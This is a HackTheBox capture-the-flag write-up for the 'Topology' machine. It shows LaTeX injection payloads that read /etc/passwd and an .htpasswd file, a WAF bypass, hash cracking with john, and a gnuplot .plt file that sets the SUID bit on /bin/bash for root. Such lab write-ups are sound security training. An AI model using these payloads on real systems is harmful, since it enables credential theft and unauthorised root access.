Close
Menu

Topology – HackTheBox -Writeup

, , , , , , , , , , , 0

Writeup of Topology from HackTheBox

Machine Name: Topology
IP: 10.10.11.217
Difficulty: Easy

Summary

Topology is an easy machine which starts by exploiting LaTeX injection to read files on the server that contain password hashes. After cracking the password hash, it was possible to login via SSH and obtain the user flag. The privilege escalation consisted of enumerating for processes that are run by root. One of the processes being run by root executed “.plt” files in a particular folder to which the user had write permissions. Finally, it was a simple matter of looking up the documentation on running OS commands for that particular extension and use it to gain a shell as root.

Information Gathering

Nmap scan shows that port 22 (SSH), and 80 (HTTP) are open. Port 80 is running Apache httpd 2.4.41 on Ubuntu.

The webpage is University page for department of Mathematics. The page contains links to a LaTeX Equation Generator which redirects to a new subdomain, “latex.topology.htb/equation.php”. Let’s add that to the /etc/hosts file.

You could try something like “\frac{sid}{thoviti}” and it would generate the image containing the expression.

LaTeX Injection

If you’ve heard of LaTeX injections before, that’s the way to go. Read this blog post on the same. The blow line of LaTeX script reads files’ first line.

\newread\file
\openin\file=/etc/passwd
\read\file to\line
\text{\line}
\closein\file

#URL
http://latex.topology.htb/equation.php?eqn=\newread\file\openin\file=/etc/passwd\read\file%20to\line\text{\line}\closein\file

If we use the loop to show all the lines in the file, we get an “Illegal command detected. Sorry.” message.

\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
    \read\file to\fileline 
    \text{\fileline}
\repeat
\closein\file

http://latex.topology.htb/equation.php?eqn=\newread\file\openin\file=/etc/passwd\loop\unless\ifeof\file\read\file%20to\fileline\text{\fileline}\repeat\closein\file

The website has some kind of filter or WAF that blocks this code. Let’s try other payloads from HackTricks to read an entire file.

\input{/etc/passwd}
\include{password} # load .tex file
\lstinputlisting{/usr/share/texmf/web2c/texmf.cnf}
\usepackage{verbatim}
\verbatiminput{/etc/passwd}

All the payloads were getting blocked and the webserver would present a message saying “Illegal command detected. Sorry.” except “\lstinputlisting{}” payload which gives different error:

To get around this error by adding $ at the beginning and end to convert it into a line formula.

$\lstinputlisting{/etc/passwd}$

We discover a user named “vdaisley”.

Getting a User Shell

We know that the server is using Apache, so the next logical step would be to check the “/var/www/dev/.htbpasswd” file that might contain usernames and their hashed passwords.

http://latex.topology.htb/equation.php?eqn=$\lstinputlisting{/var/www/dev/.htpasswd}$

Great we discovered the password hash for “vdaisley”. Let’s use an online OCR tool to get the text from this image and use john to crack the hash.

echo "$apr1$1ONUB/S2$58eeNVirnRDB5zAIbIxTY0" > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=md5crypt

John successfully cracked the hash to be “calculus20”. Let’s try login through SSH as vdaisley.

ssh vdaisley@topology.htb

And we’re in!

Privilege Escalation

As always, I tried sudo -l, but it did not result in anything interesting. Therefore, I transferred linpeas and ran it. Apart from finding some more subdomains, I did not find anything interesting.

In that case, I always transfer pspy and check for processes that are run by root. We see that a cron runs files in “/opt/gnuplot/” that end with the extension “.plt” using the find command.

It is observed that we only have write-execute permissions for the “gnuplot” directory. Since find executes all the files ending with the “.plt” extension inside this directory, let us try to find a way to create a malicious plt file.

The GNUplot documentation informs us of the “system” command that executes OS commands.

system "command string"

Let us use this to add the suid bit to the bash binary and get root permissions when it is run through cron by “find” command.

echo 'system "chmod u+s /bin/bash"' > rootme.plt

As soon as the cron job runs the file, the suid bit is set for the bash binary and we can run bash with root privileges.

Pwned!

Thoviti Siddharth

I'm passionate about cybersecurity, machine learning, machine vision, web development. ​Welcome to my website! I write about my computer science experiments and thoughts that drive me to write.

→ Thoviti Siddharth

Related Posts

Leave a Reply

Your email address will not be published. Required fields are marked *